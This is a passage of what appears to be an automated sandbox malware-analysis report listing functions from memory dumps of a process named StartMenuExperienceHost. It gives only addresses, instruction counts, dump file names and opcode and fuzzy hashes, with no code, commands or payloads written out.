                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 2134e99541dd5352bd2f6c08102de2120707b3de43a6d10785432f5e6c056388
                                                                  • Instruction ID: ee7bac50d780a4a12b916f83b6fcd893ff8188c2b0b24ea6372c7eac7556f265
                                                                  • Opcode Fuzzy Hash: 2134e99541dd5352bd2f6c08102de2120707b3de43a6d10785432f5e6c056388
                                                                  • Instruction Fuzzy Hash: FD011630D0D2899FE716FB6488541AD7FB0EF86394F1941F7D844DB2D2DA38AA44C785
                                                                  Function 00007FF848F6AE23 Relevance: .0, Instructions: 36COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000022.00000002.2290714436.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_34_2_7ff848f61000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 33a8d53fec8e9010b992e606046bb59222c9b0215d1aacdbdb4df98282621b46
                                                                  • Instruction ID: 08124ee423871d37be2fdd98714715ede4341057b1e7031f90dae07ea063bd74
                                                                  • Opcode Fuzzy Hash: 33a8d53fec8e9010b992e606046bb59222c9b0215d1aacdbdb4df98282621b46
                                                                  • Instruction Fuzzy Hash: 3FF09031E1C94A8EE685FB29448A3B873D1FFA8744F5012B9D40CD32C3DF2CA8828749
                                                                  Function 00007FF848F6AAA9 Relevance: .0, Instructions: 36COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000022.00000002.2290714436.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_34_2_7ff848f61000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: ad66ffca41f7e71f155b84d3ac5f62a0f224d0f0dfcb05408bab969f103e13e7
                                                                  • Instruction ID: 72dd0c875c2ce82a46c0aa7fe4b19e2be58e6bb2b06219c2852aced195dfa25b
                                                                  • Opcode Fuzzy Hash: ad66ffca41f7e71f155b84d3ac5f62a0f224d0f0dfcb05408bab969f103e13e7
                                                                  • Instruction Fuzzy Hash: 16F0A021B1CBC44FD72A96395865061BFE1DF9B50274A12EFC096C72E3ED58EC86C741
                                                                  Function 00007FF848F30BB5 Relevance: .0, Instructions: 36COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000022.00000002.2290714436.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_34_2_7ff848f30000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: e6f6c32a4ff5cfaeaf2b5051f3b9089556b6f1a1877cb541a2d7b08c7f3812b8
                                                                  • Instruction ID: 2f40d33765d1bbc83eeefacfd4ba60ea863b9e80c47ded62625a5ad1b7144920
                                                                  • Opcode Fuzzy Hash: e6f6c32a4ff5cfaeaf2b5051f3b9089556b6f1a1877cb541a2d7b08c7f3812b8
                                                                  • Instruction Fuzzy Hash: 12F0E530E5E54A4FEA407338D8D24A87F60EF4B210FC504F3D488C60D2EA49589A8316
                                                                  Function 00007FF848F30B77 Relevance: .0, Instructions: 35COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000022.00000002.2290714436.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_34_2_7ff848f30000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: a60203e813ceb39d3c82471d84d4f87af386272471654d4b582eb302ad88453c
                                                                  • Instruction ID: 70a3877ed62bfb3509e2ab12c23e84a1e87069f32e3b9ef7c5a6c927a5cc40be
                                                                  • Opcode Fuzzy Hash: a60203e813ceb39d3c82471d84d4f87af386272471654d4b582eb302ad88453c
                                                                  • Instruction Fuzzy Hash: 42F0553560E589CFDB80AB38ECA04E4BB60FF03209B5616EAD088C3092D2524409C700
                                                                  Function 00007FF848F319C3 Relevance: .0, Instructions: 35COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000022.00000002.2290714436.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_34_2_7ff848f30000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 9fa238edc377ae3c28a821189041c77311f2d43d622b9171109d735dc1095405
                                                                  • Instruction ID: 8042e034695f520ab9c6597f4a519c9ba2bd530793a653c8d701b07bd4bf5608
                                                                  • Opcode Fuzzy Hash: 9fa238edc377ae3c28a821189041c77311f2d43d622b9171109d735dc1095405
                                                                  • Instruction Fuzzy Hash: 58F03C30E0C81A8FEBA4FB14CC546F873A1EB90392F1401B7D04E932E5DE3869C68B48
                                                                  Function 00007FF848F44AF1 Relevance: .0, Instructions: 34COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000022.00000002.2290714436.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_34_2_7ff848f40000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5fb33072080be913be9d42331943476139b32ac1f4d870900f479b25c5f3ffee
                                                                  • Instruction ID: 0c485d6765ab88014a6037399d4770efe4abfd811bd7f5d067b1c8a09bce2246
                                                                  • Opcode Fuzzy Hash: 5fb33072080be913be9d42331943476139b32ac1f4d870900f479b25c5f3ffee
                                                                  • Instruction Fuzzy Hash: CBF05E31E0E5174FE619BB0CA4406B93290EF35798F144177D44EF31D7DF28A8029699
                                                                  Function 00007FF848F679ED Relevance: .0, Instructions: 32COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000022.00000002.2290714436.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_34_2_7ff848f61000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 5943ef0818284c397c42a77bd77afce88870ad6e93d1216e3bac76002c181dd9
                                                                  • Instruction ID: 8e33a0c3ee8f2c9ae11a7fc0aca886820a7462a7c5cad48c0cb011f5f52cfe5e
                                                                  • Opcode Fuzzy Hash: 5943ef0818284c397c42a77bd77afce88870ad6e93d1216e3bac76002c181dd9
                                                                  • Instruction Fuzzy Hash: FFF0F220A4E7C20FC30B573848654603FB09E2725179A05EBD08ACF5F3D9199C9AC362
                                                                  Function 00007FF848F493CA Relevance: .0, Instructions: 27COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000022.00000002.2290714436.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_34_2_7ff848f40000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 3a08f910b13df37a5a6ab1e482315d2dce376673c0bd6dd054eb2a206bbd471b
                                                                  • Instruction ID: 70c0c941db31117ad0ba338840a1007f7c8837ba9fd2a18aac6bcfe280b00cd0
                                                                  • Opcode Fuzzy Hash: 3a08f910b13df37a5a6ab1e482315d2dce376673c0bd6dd054eb2a206bbd471b
                                                                  • Instruction Fuzzy Hash: 49F06C35E0C81D8FE685FB14845537962A2FF98340F4401F6D80DE72D6CE28BC414B55
                                                                  Function 00007FF848F361A2 Relevance: .0, Instructions: 25COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000022.00000002.2290714436.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_34_2_7ff848f30000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 56b90ccf1736245e8e2943db465f5a8918f681c939a5da53cd05dabe9b78db00
                                                                  • Instruction ID: 41e640aa316bf1bb5b6a77aa7f054218c07d893dc2d367c08d0827aa9a49684e
                                                                  • Opcode Fuzzy Hash: 56b90ccf1736245e8e2943db465f5a8918f681c939a5da53cd05dabe9b78db00
                                                                  • Instruction Fuzzy Hash: CCF03934D0C1168FF7A4A294D4513AAA3A0EB84350F1410BAE90EA33C2DE3CAE818B19
                                                                  Function 00007FF848F679B9 Relevance: .0, Instructions: 24COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000022.00000002.2290714436.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_34_2_7ff848f61000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 43ef69cfe2cd081bc163f14d1298855fb808042f6bd2c2ef56c820eb5dbd446b
                                                                  • Instruction ID: d400a898ee4f823b8584397bd0e96f09974623007ee80b9e0da49b6abdae0da8
                                                                  • Opcode Fuzzy Hash: 43ef69cfe2cd081bc163f14d1298855fb808042f6bd2c2ef56c820eb5dbd446b
                                                                  • Instruction Fuzzy Hash: D8E04F21A897800FC30A663488658543FB0DF6B215B4A00D7D045CF1B3D61DDC49C711
                                                                  Function 00007FF848F6DA99 Relevance: .0, Instructions: 23COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000022.00000002.2290714436.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_34_2_7ff848f61000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: bd4437a3c26606ce36f4605a7d7bbe911869ce1ee1e19c70acd622214e478a0e
                                                                  • Instruction ID: 5cd17015a6b4104e5cae87253162adf2d9a25b1ecd5f4e0bb2854229b0714809
                                                                  • Opcode Fuzzy Hash: bd4437a3c26606ce36f4605a7d7bbe911869ce1ee1e19c70acd622214e478a0e
                                                                  • Instruction Fuzzy Hash: 70E01A7294E7C04FC70BAB3488A99503F70EE6721074A55EEC045CF1A3E619884AC701
                                                                  Function 00007FF848F48868 Relevance: .0, Instructions: 22COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000022.00000002.2290714436.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_34_2_7ff848f40000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: eb1a7d33a742f6e8f7a77633b1a5bd1ee4c699db2b77335f0bdb57303ad7e7ac
                                                                  • Instruction ID: ad7d8d11ea62537b8ed61d786669e0d057a809d108540207a386bbb4c775015f
                                                                  • Opcode Fuzzy Hash: eb1a7d33a742f6e8f7a77633b1a5bd1ee4c699db2b77335f0bdb57303ad7e7ac
                                                                  • Instruction Fuzzy Hash: 99E09231D0C4068FF700BB50C4046E872049F11394F0942B68C0CAB2D3DF5C694847C5
                                                                  Function 00007FF848F6A610 Relevance: .0, Instructions: 22COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000022.00000002.2290714436.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_34_2_7ff848f61000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                  • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                  • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                  • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                  Function 00007FF848F6A580 Relevance: .0, Instructions: 22COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000022.00000002.2290714436.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_34_2_7ff848f61000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                  • Instruction ID: 3b92578e4f7772e49ffbfe9f1dff6bdc011e0549b8a98965e61b2550fcb9a3e4
                                                                  • Opcode Fuzzy Hash: 86516cfc4d8a0d480af8f07283063ca962ff981a2c8af2a83e93b7d611e3f089
                                                                  • Instruction Fuzzy Hash: 41D0A930B10E0C4B8B0CB63D885C430B3D2E7B9202384536E940AC32A1ED26ECC9CB80
                                                                  Function 00007FF848F6DA19 Relevance: .0, Instructions: 21COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000022.00000002.2290714436.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_34_2_7ff848f61000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b6056958181af99d3bf80f548bfcaaa55ca6658d4ac86c10ff2831bdf5bd8294
                                                                  • Instruction ID: 6c421da079e48881c90247af84d89097529c9350f51e9a91ba401aa4feeb1982
                                                                  • Opcode Fuzzy Hash: b6056958181af99d3bf80f548bfcaaa55ca6658d4ac86c10ff2831bdf5bd8294
                                                                  • Instruction Fuzzy Hash: 8EE01A2194E7C08FC70B973588698507F60DE2721074E41EEC185CF1A3D6198849C701
                                                                  Function 00007FF848F623C0 Relevance: .0, Instructions: 18COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000022.00000002.2290714436.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_34_2_7ff848f61000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                  • Instruction ID: 8f180aab2aa75e9180ee0f7869d42a8d0eff98467748f81fc95ef1229aac25a4
                                                                  • Opcode Fuzzy Hash: 30b88120e300ce741a67909c90f8bad83c6bf9a8a2db7280cd1828b58fc114cc
                                                                  • Instruction Fuzzy Hash: D2D01230750D084F8B4CF63C885996033D1E76D2167854059D00AC72B1E966DC89C741
                                                                  Function 00007FF848F6B890 Relevance: .0, Instructions: 17COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000022.00000002.2290714436.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_34_2_7ff848f61000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0382474be2252812ffddbfc94a16e0f37ee67439e0a9c7c8d7487183ef8c9765
                                                                  • Instruction ID: 94d08d2a8110e923dbf233342143cb77bacfc293ab0e6e987a3c2764f880ea2b
                                                                  • Opcode Fuzzy Hash: 0382474be2252812ffddbfc94a16e0f37ee67439e0a9c7c8d7487183ef8c9765
                                                                  • Instruction Fuzzy Hash: CFD01234B689044FC70CBB3988598747391EB6A216B9551A9D00BD72B2DA6ADC89C741
                                                                  Function 00007FF848F66F70 Relevance: .0, Instructions: 17COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000022.00000002.2290714436.00007FF848F61000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F61000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_34_2_7ff848f61000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: cafd7b5e3ac81762a707ba99b176ee0fab41c2c9d3fb29d38313d5a8f2fc29b3
                                                                  • Instruction ID: a9a630785914d46d9edd85a00b8a0ba6d437fd629e332af715c297eacf8e3ba9
                                                                  • Opcode Fuzzy Hash: cafd7b5e3ac81762a707ba99b176ee0fab41c2c9d3fb29d38313d5a8f2fc29b3
                                                                  • Instruction Fuzzy Hash: 51D01234B64D044FC70CB73CC85987473D1EB6A216B9552A9D00AD72B1DA6ADC8AC741
                                                                  Function 00007FF848F44244 Relevance: .0, Instructions: 14COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000022.00000002.2290714436.00007FF848F40000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F40000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_34_2_7ff848f40000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 81f5113eb7e395b77159fec25ff99f9593e9988ad2e3a332f695ac29d4b590a3
                                                                  • Instruction ID: 2b9d6efbd2c4c20f27197b697b4e1b1c5295d44305690c09f94f04915d8c2f83
                                                                  • Opcode Fuzzy Hash: 81f5113eb7e395b77159fec25ff99f9593e9988ad2e3a332f695ac29d4b590a3
                                                                  • Instruction Fuzzy Hash: 3DD017B0D1E61EAEEB41AB64C0122BEBEB0EF50384F500076D109A22D7DF3C29458B88
                                                                  Function 00007FF848F306A5 Relevance: .0, Instructions: 13COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000022.00000002.2290714436.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_34_2_7ff848f30000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 53971b2b7a1ccf372673725fb3507a6dec60887fbbe3a948b12780484fbb2f21
                                                                  • Instruction ID: 326b8de8d886ff496f5c18850a3a278a94aa64266d6fa89b44eb625044fa786c
                                                                  • Opcode Fuzzy Hash: 53971b2b7a1ccf372673725fb3507a6dec60887fbbe3a948b12780484fbb2f21
                                                                  • Instruction Fuzzy Hash: E2C08C20D1F80F0AF400B32E14020ACA1009BC4390FD00073C80C401C5AE0D21C5018E
                                                                  Function 00007FF848F312B0 Relevance: .0, Instructions: 12COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000022.00000002.2290714436.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_34_2_7ff848f30000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 85e310c31d9c320a6a6d98d9c2204c04a471e198612afe6b49aad868d401953c
                                                                  • Instruction ID: 080bbe0f0f5e2b719b9dbe9ead134434cdac85d167a41a6db6a7bd7504e0cd23
                                                                  • Opcode Fuzzy Hash: 85e310c31d9c320a6a6d98d9c2204c04a471e198612afe6b49aad868d401953c
                                                                  • Instruction Fuzzy Hash: 85C04C34555C098FC948FB29C88591477A0FB19215BD60090E409CB1B1D659DCD5C745
                                                                  Function 00007FF848F30B18 Relevance: .0, Instructions: 12COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000022.00000002.2290714436.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_34_2_7ff848f30000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 0e13373b9b58342ce0a6d250e1279e2ab542b43c18f7d8366746ebde3e909453
                                                                  • Instruction ID: 2dd0114cb7b838ab2c4b38e2b092f044fa6d3efbaeafe2d5c2a324c08edb4883
                                                                  • Opcode Fuzzy Hash: 0e13373b9b58342ce0a6d250e1279e2ab542b43c18f7d8366746ebde3e909453
                                                                  • Instruction Fuzzy Hash: 95C04C305158099FC954F72DC98595476A0FB4D215BD50190E40DCB2B1E75A9C95C745
                                                                  Function 00007FF848F35E65 Relevance: .0, Instructions: 10COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000022.00000002.2290714436.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_34_2_7ff848f30000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6d9e219ba5c0a3402ffbf828d9a008d7df5c97a06b5773f8191922d24426201f
                                                                  • Instruction ID: 02d34edc13e55e255446c178084e1f26b2acab6849fb43e11c343d72cfb5da52
                                                                  • Opcode Fuzzy Hash: 6d9e219ba5c0a3402ffbf828d9a008d7df5c97a06b5773f8191922d24426201f
                                                                  • Instruction Fuzzy Hash: FFC04C15E2B81A9AF266631550312BE48579F84748F946076F40E873CACF4C5B41428F
                                                                  Function 00007FF848F306C8 Relevance: .0, Instructions: 8COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000022.00000002.2290714436.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_34_2_7ff848f30000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6eba791d88507fcd9b52fcee0306e07b664c1240055e9c8e5b93111289e53873
                                                                  • Instruction ID: 8622f6891dee52e5bb6be83a981e4ac7dfc8e75a6fca5afcec18121fca364e56
                                                                  • Opcode Fuzzy Hash: 6eba791d88507fcd9b52fcee0306e07b664c1240055e9c8e5b93111289e53873
                                                                  • Instruction Fuzzy Hash: 97B00214C6F44F05E454337A195606574509B85254FD511B3D80D501C5994D15D5129A

                                                                  Executed Functions

                                                                  Function 00007FF848F30D4C Relevance: 1.5, Strings: 1, Instructions: 257COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000023.00000002.2270335718.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_35_2_7ff848f30000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: 5Y_H
                                                                  • API String ID: 0-3237497481
                                                                  • Opcode ID: 4818a96860a6b70b7c3f8bfecc4814f7377ee546507d92ebb15a5e8fdd7a5734
                                                                  • Instruction ID: ff97c0b3a1fe18415a1b6904cebebe79a39482a27b241eb32d9530ac1dc38391
                                                                  • Opcode Fuzzy Hash: 4818a96860a6b70b7c3f8bfecc4814f7377ee546507d92ebb15a5e8fdd7a5734
                                                                  • Instruction Fuzzy Hash: 3191CD7091DA9A8FE789EB2C88697A97FE1FB96384F0401BBC009D72D2CF7D18158704
                                                                  Function 00007FF848F30E43 Relevance: .2, Instructions: 170COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000023.00000002.2270335718.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_35_2_7ff848f30000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: b68f420be7af63a6b27a216610e679e62b1773d2ce4b6069356f95474b0f24d1
                                                                  • Instruction ID: 3c2333de3c68e513b3798dd624947aa6c166ccd135f72a04c4b768d79a00bb70
                                                                  • Opcode Fuzzy Hash: b68f420be7af63a6b27a216610e679e62b1773d2ce4b6069356f95474b0f24d1
                                                                  • Instruction Fuzzy Hash: 40517E71A19A5D8EE388EB2C84697B97FE1FB96398F5401BBC009D37D5CB7D14218704
                                                                  Function 00007FF848F30B3F Relevance: 3.8, Strings: 3, Instructions: 55COMMON
                                                                  Download Yara Rule
                                                                  Strings
                                                                  Memory Dump Source
                                                                  • Source File: 00000023.00000002.2270335718.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_35_2_7ff848f30000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID: c9$!k9$"s9
                                                                  • API String ID: 0-3426396564
                                                                  • Opcode ID: cdf7b1fedab0e168c2ec0b290fe1cc7e2c36fd2936d99a0828d24243f39e5afb
                                                                  • Instruction ID: 386a76b0966d0e40da1e6e04ded984efde0c60a5b7caa05744b9f1ec4f4d1ef4
                                                                  • Opcode Fuzzy Hash: cdf7b1fedab0e168c2ec0b290fe1cc7e2c36fd2936d99a0828d24243f39e5afb
                                                                  • Instruction Fuzzy Hash: 0F01263771E94E4BD7417B3DF8904E8B740EA97236B9503F7D444C7192E642144A83D0
                                                                  Function 00007FF848F308D0 Relevance: .1, Instructions: 131COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000023.00000002.2270335718.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_35_2_7ff848f30000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: 6bacef6d0432a0443cd5dcf03612bbc5eaee12a620be7a779c39270aa3c59724
                                                                  • Instruction ID: a871c85ef2a19cb65069170a4cb02b35b919d0d68c7353d0812c20d886c700cc
                                                                  • Opcode Fuzzy Hash: 6bacef6d0432a0443cd5dcf03612bbc5eaee12a620be7a779c39270aa3c59724
                                                                  • Instruction Fuzzy Hash: F8415622A1E9599EE344B77C60892FE3790EF853A9F0802BBD44CCB1D7CF1C68418298
                                                                  Function 00007FF848F30998 Relevance: .1, Instructions: 124COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000023.00000002.2270335718.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
                                                                  Joe Sandbox IDA Plugin
                                                                  • Snapshot File: hcaresult_35_2_7ff848f30000_StartMenuExperienceHost.jbxd
                                                                  Similarity
                                                                  • API ID:
                                                                  • String ID:
                                                                  • API String ID:
                                                                  • Opcode ID: f6af17f9feccf797334bf3e31e780771f7a539415576bdbf88113a86b13c4be0
                                                                  • Instruction ID: 79edc7c03b55473daf5a050c515d4ec0a1736e85338dd9e73b4449a33626b53a
                                                                  • Opcode Fuzzy Hash: f6af17f9feccf797334bf3e31e780771f7a539415576bdbf88113a86b13c4be0
                                                                  • Instruction Fuzzy Hash: 8431E130B1DD595FE788F73D949A67936C2EB99395F1400BAE80DC33E6DE28AC418748
                                                                  Function 00007FF848F30C25 Relevance: .1, Instructions: 87COMMON
                                                                  Download Yara Rule
                                                                  Memory Dump Source
                                                                  • Source File: 00000023.00000002.2270335718.00007FF848F30000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FF848F30000, based on PE: false
